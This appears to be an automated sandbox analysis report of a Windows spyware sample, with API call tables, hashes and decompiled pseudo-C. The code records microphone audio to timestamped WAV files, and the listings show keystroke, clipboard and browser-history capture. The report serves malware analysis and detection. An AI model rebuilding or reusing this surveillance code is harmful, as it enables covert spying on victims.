                                        0x0040bfd8
                                        0x0040bfd8
                                        0x0040bfff
                                        0x0040c00b

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,00000004), ref: 0040BE49
                                          • Part of subcall function 0040BD9B: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM,00000004,?,0040BE54,?,?,00000004), ref: 0040BDAE
                                          • Part of subcall function 0040BD9B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE1E
                                        • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00020019,0040C731), ref: 0040BE67
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00415B14,0041B310,00000000,0041B310,00000000,0041B310,0041BE30,0041B310,0041BE50), ref: 0040BECF
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041BE30,0041B310,0041BE50), ref: 0040BEDC
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,0041BE50), ref: 0040BEE9
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,0041BE50), ref: 0040BEF6
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,0041BE50), ref: 0040BF03
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040BF10
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040BF20
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040BF2A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000071), ref: 0040BF44
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF4D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF56
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF5F
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF68
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF71
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF7A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF83
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF8F
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00415800), ref: 0040BFA0
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00415800), ref: 0040BFAC
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 0040BFBD
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 0040BFC9
                                        • RegCloseKey.ADVAPI32(0040C731), ref: 0040BFD2
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B1C,?), ref: 0040BFEA
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000072), ref: 0040BFFF
                                          • Part of subcall function 0040BB20: RegQueryInfoKeyW.ADVAPI32 ref: 0040BB8F
                                          • Part of subcall function 0040BB20: RegEnumKeyExW.ADVAPI32 ref: 0040BBBE
                                          • Part of subcall function 0040BB20: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041623C,?), ref: 0040BBD4
                                          • Part of subcall function 0040BB20: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040BBE6
                                          • Part of subcall function 0040BB20: ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,0040BE7D,0040C731), ref: 0040BBF4
                                          • Part of subcall function 0040BB20: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BBFD
                                          • Part of subcall function 0040BB20: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BC06
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$D@2@@0@Hstd@@$G@std@@V10@0@$G@2@@std@@$V01@$??4?$basic_string@$??0?$basic_string@$V01@@V10@@$??8std@@CloseD@1@@EnumG@1@@G@2@@0@InfoOpenQueryY?$basic_string@
                                        • String ID:
                                        • API String ID: 3909728815-0
                                        • Opcode ID: 304b19fcc533cbdc73590744d06a2ca5d32eb884cf4499deb611cf95ec401a1b
                                        • Instruction ID: 9e337717dcf7d24ebdd05483ab6efa78b4c81bdad12c42f1fd6fa3557793e14f
                                        • Opcode Fuzzy Hash: 304b19fcc533cbdc73590744d06a2ca5d32eb884cf4499deb611cf95ec401a1b
                                        • Instruction Fuzzy Hash: 7741477290020DEBCB04BBE1ED4ADDE7B7CDF94345B10403AF506A7152EB785A85CBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00401640, Relevance: 38.6, APIs: 20, Strings: 2, Instructions: 102stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 20%
                                        			E00401640(void* __edx, intOrPtr _a8, char _a11) {
				char _v5;
				char _v12;
				void* _v28;
				char _v44;
				char _v60;
				char _v76;
				char _v92;
				char _v108;
				char _v188;
				int _t23;
				char* _t25;
				char* _t32;
				char* _t33;
				char* _t34;
				CHAR* _t36;
				intOrPtr _t37;
				void* _t56;

				_t23 =  &_v5;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z(_t23);
				if(_a8 == 0x3c0) {
					__imp__time( &_v12, _t56);
					_t25 =  &_v12;
					__imp__localtime(_t25);
					__imp__strftime( &_v188, 0x50, "%Y-%m-%d %H.%M", _t25);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v188,  &_a11);
					_t32 =  &_v76;
					L00414152();
					_t33 =  &_v108;
					L0041414C();
					_t34 =  &_v60;
					L00414146();
					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t34, _t34, _t33, _t33, _t32, _t32, 0x41b1e8, 0x5c, E00412795( &_v92,  &_v44), L".wav");
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					E004013BE(_t34, 0x41b1a0);
					_t36 = waveInUnprepareHeader( *0x41b210, 0x41b1a0, 0x20);
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					0x41b1a0->lpData = _t36;
					_t37 =  *0x41b1d8; // 0x0
					 *0x41b1a4 = _t37;
					 *0x41b1a8 = 0;
					 *0x41b1ac = 0;
					 *0x41b1b0 = 0;
					 *0x41b1b4 = 0;
					waveInPrepareHeader( *0x41b210, 0x41b1a0, 0x20);
					_t23 = waveInAddBuffer( *0x41b210, 0x41b1a0, 0x20);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t23;
			}




















                                        0x00401649
                                        0x00401650
                                        0x0040165d
                                        0x00401668
                                        0x0040166e
                                        0x00401672
                                        0x00401687
                                        0x0040169e
                                        0x004016bb
                                        0x004016c4
                                        0x004016cd
                                        0x004016d1
                                        0x004016da
                                        0x004016de
                                        0x004016ea
                                        0x004016f3
                                        0x004016fc
                                        0x00401705
                                        0x0040170e
                                        0x00401717
                                        0x00401726
                                        0x0040172d
                                        0x0040173d
                                        0x00401748
                                        0x0040174e
                                        0x00401753
                                        0x00401758
                                        0x0040175f
                                        0x00401764
                                        0x00401769
                                        0x0040176e
                                        0x0040177c
                                        0x0040178b
                                        0x00401791
                                        0x00401795
                                        0x0040179c

                                        APIs
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00401650
                                        • time.MSVCRT ref: 00401668
                                        • localtime.MSVCRT ref: 00401672
                                        • strftime.MSVCRT ref: 00401687
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 0040169E
                                          • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                          • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                          • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                          • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                          • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,0041B1E8,0000005C,00000000,.wav), ref: 004016C4
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,.wav), ref: 004016D1
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00000000,.wav), ref: 004016DE
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00000000,.wav), ref: 004016EA
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 004016F3
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 004016FC
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 00401705
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 0040170E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 00401717
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041B1A0,?,?,?,?,?,?,?,00000000,.wav), ref: 00401726
                                          • Part of subcall function 004013BE: CreateFileW.KERNEL32(00401732,40000000,00000000,00000000,00000002,00000080,00000000,?,0041B1A0), ref: 00401424
                                        • waveInUnprepareHeader.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040173D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,00000000,.wav), ref: 00401748
                                        • waveInPrepareHeader.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040177C
                                        • waveInAddBuffer.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040178B
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000,.wav), ref: 00401795
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$D@2@@std@@D@std@@$??0?$basic_string@$G@2@@0@Hstd@@V?$basic_string@wave$?begin@?$basic_string@?c_str@?$basic_string@G@1@@HeaderV01@@V10@$??4?$basic_string@?end@?$basic_string@?length@?$basic_string@BufferCreateD@1@@FilePrepareUnprepareV01@V10@0@localtimestrftimetime
                                        • String ID: %Y-%m-%d %H.%M$.wav
                                        • API String ID: 4079669728-3597965672
                                        • Opcode ID: 65b9f5944380e4cbf397f0c8d18f8494b2e2b8de5bcf2efd9865c90dbcd23412
                                        • Instruction ID: bf0964d1dea1fddfd3b2107398812174aa57f11fbff5416b66007043dfe7270a
                                        • Opcode Fuzzy Hash: 65b9f5944380e4cbf397f0c8d18f8494b2e2b8de5bcf2efd9865c90dbcd23412
                                        • Instruction Fuzzy Hash: C641F87180060DEFDB00EBA0EC5DADE7B79EB48345F448036F505E71A0EB746689CB98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004013BE, Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 154fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 95%
                                        			E004013BE(long _a4, void** _a8) {
				void _v8;
				void _v12;
				void _v16;
				void _v20;
				void _v24;
				void _v28;
				signed int _t37;
				signed int _t41;
				void* _t82;
				signed int _t83;
				signed int _t89;

				_t83 =  *0x41b21a & 0x0000ffff;
				_t37 = ( *0x41b226 & 0x0000ffff) * _t83;
				_v20 = _t37 *  *0x41b21c >> 3;
				asm("cdq");
				_t89 = 8;
				_v16 = 1;
				_v12 = 0x10;
				_v24 = _t37 / _t89;
				_t41 = _a8[1] * _t83;
				_v28 = _t41;
				_v8 = _t41 + 0x24;
				_t82 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t82 != 0xffffffff) {
					WriteFile(_t82, "RIFF", 4,  &_a4, 0);
					WriteFile(_t82,  &_v8, 4,  &_a4, 0);
					WriteFile(_t82, "WAVE", 4,  &_a4, 0);
					WriteFile(_t82, "fmt ", 4,  &_a4, 0);
					WriteFile(_t82,  &_v12, 4,  &_a4, 0);
					WriteFile(_t82,  &_v16, 2,  &_a4, 0);
					WriteFile(_t82, 0x41b21a, 2,  &_a4, 0);
					WriteFile(_t82, 0x41b21c, 4,  &_a4, 0);
					WriteFile(_t82,  &_v20, 4,  &_a4, 0);
					WriteFile(_t82,  &_v24, 2,  &_a4, 0);
					WriteFile(_t82, 0x41b226, 2,  &_a4, 0);
					WriteFile(_t82, "data", 4,  &_a4, 0);
					WriteFile(_t82,  &_v28, 4,  &_a4, 0);
					WriteFile(_t82,  *_a8, _a8[1],  &_a4, 0);
					CloseHandle(_t82);
					return 1;
				}
				return 0;
			}














                                        0x004013c4
                                        0x004013d2
                                        0x004013e4
                                        0x004013e9
                                        0x004013ea
                                        0x00401401
                                        0x00401408
                                        0x0040140f
                                        0x00401418
                                        0x0040141b
                                        0x00401421
                                        0x0040142a
                                        0x0040142f
                                        0x0040144b
                                        0x00401459
                                        0x00401468
                                        0x00401477
                                        0x00401485
                                        0x00401493
                                        0x004014a2
                                        0x004014b1
                                        0x004014bf
                                        0x004014cd
                                        0x004014dc
                                        0x004014eb
                                        0x004014f9
                                        0x00401509
                                        0x0040150c
                                        0x00000000
                                        0x00401512
                                        0x00000000

                                        APIs
                                        • CreateFileW.KERNEL32(00401732,40000000,00000000,00000000,00000002,00000080,00000000,?,0041B1A0), ref: 00401424
                                        • WriteFile.KERNEL32(00000000,RIFF,00000004,00000010,00000000,?,0041B1A0), ref: 0040144B
                                        • WriteFile.KERNEL32(00000000,00000000,00000004,00000010,00000000,?,0041B1A0), ref: 00401459
                                        • WriteFile.KERNEL32(00000000,WAVE,00000004,00000010,00000000,?,0041B1A0), ref: 00401468
                                        • WriteFile.KERNEL32(00000000,fmt ,00000004,00000010,00000000,?,0041B1A0), ref: 00401477
                                        • WriteFile.KERNEL32(00000000,00000010,00000004,00000010,00000000,?,0041B1A0), ref: 00401485
                                        • WriteFile.KERNEL32(00000000,00000001,00000002,00000010,00000000,?,0041B1A0), ref: 00401493
                                        • WriteFile.KERNEL32(00000000,0041B21A,00000002,00000010,00000000,?,0041B1A0), ref: 004014A2
                                        • WriteFile.KERNEL32(00000000,0041B21C,00000004,00000010,00000000,?,0041B1A0), ref: 004014B1
                                        • WriteFile.KERNEL32(00000000,?,00000004,00000010,00000000,?,0041B1A0), ref: 004014BF
                                        • WriteFile.KERNEL32(00000000,?,00000002,00000010,00000000,?,0041B1A0), ref: 004014CD
                                        • WriteFile.KERNEL32(00000000,0041B226,00000002,00000010,00000000,?,0041B1A0), ref: 004014DC
                                        • WriteFile.KERNEL32(00000000,data,00000004,00000010,00000000,?,0041B1A0), ref: 004014EB
                                        • WriteFile.KERNEL32(00000000,?,00000004,00000010,00000000,?,0041B1A0), ref: 004014F9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: File$Write$Create
                                        • String ID: RIFF$WAVE$data$fmt
                                        • API String ID: 1602526932-4212202414
                                        • Opcode ID: a99678cb21b7d93cbe87bee30868a2d6c3fec46b9c3e62da9134e588c1076753
                                        • Instruction ID: 91b5b913efd348db76e64cf746c5e08b94ff9205a7cc9a5ceb03776573d28bcb
                                        • Opcode Fuzzy Hash: a99678cb21b7d93cbe87bee30868a2d6c3fec46b9c3e62da9134e588c1076753
                                        • Instruction Fuzzy Hash: 6F411CB654021CBAD7109BA1DC89FEB7FBCEBC5B10F008416BA06EA181D674D744CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00401B26, Relevance: 35.1, APIs: 19, Strings: 1, Instructions: 105sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401B3E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00401B4B
                                          • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 004124CD
                                          • Part of subcall function 004124BE: time.MSVCRT ref: 004124E5
                                          • Part of subcall function 004124BE: srand.MSVCRT ref: 004124F2
                                          • Part of subcall function 004124BE: rand.MSVCRT ref: 00412506
                                          • Part of subcall function 004124BE: rand.MSVCRT ref: 0041251A
                                          • Part of subcall function 004124BE: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041252D
                                          • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041253D
                                          • Part of subcall function 004124BE: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 00412546
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B5D
                                          • Part of subcall function 0041358B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                          • Part of subcall function 0041358B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                          • Part of subcall function 0041358B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                          • Part of subcall function 0041358B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401B75
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B80
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /sort "Visit Time" /stext ",?,?,00415628,00000000), ref: 00401B9C
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 00401BAE
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401BBB
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00401BC8
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00401BD2
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BE3
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BEC
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BF5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BFE
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00401C0D
                                          • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                        • Sleep.KERNEL32(000000FA), ref: 00401C24
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000009D), ref: 00401C35
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401C3E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401C52
                                        Strings
                                        • /sort "Visit Time" /stext ", xrefs: 00401B97
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$D@2@@std@@D@std@@$??1?$basic_string@G@2@@std@@$??0?$basic_string@$?c_str@?$basic_string@$D@1@@G@2@@0@Hstd@@V?$basic_string@$FileV01@@rand$CreateG@1@@ModuleNameSleepV01@V10@V10@0@V10@@Y?$basic_string@srandtime
                                        • String ID: /sort "Visit Time" /stext "
                                        • API String ID: 1247708949-1573945896
                                        • Opcode ID: c9265e89abb72ce271c0bd17de8721e1b2a5c4203b50f58a46765617997ca894
                                        • Instruction ID: 821258ceffa38abf0b50ebb2211f36aec7c07e94205cba95cd2ca02b6bdb4f84
                                        • Opcode Fuzzy Hash: c9265e89abb72ce271c0bd17de8721e1b2a5c4203b50f58a46765617997ca894
                                        • Instruction Fuzzy Hash: B131127290050DEBCB04EBE0ED4D9DE777CEB58345F104036F902E7090EA759A49CBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00406952, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 135COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B9C,?,00000000,?,745E73F0,?), ref: 0040697B
                                        • toupper.MSVCRT ref: 0040698A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [Ctrl + ,?,00000000), ref: 0040699E
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 004069A9
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004069C5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004069CE
                                        • toupper.MSVCRT ref: 00406A61
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004069B3
                                          • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                          • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                          • Part of subcall function 004054E9: SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                          • Part of subcall function 004054E9: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
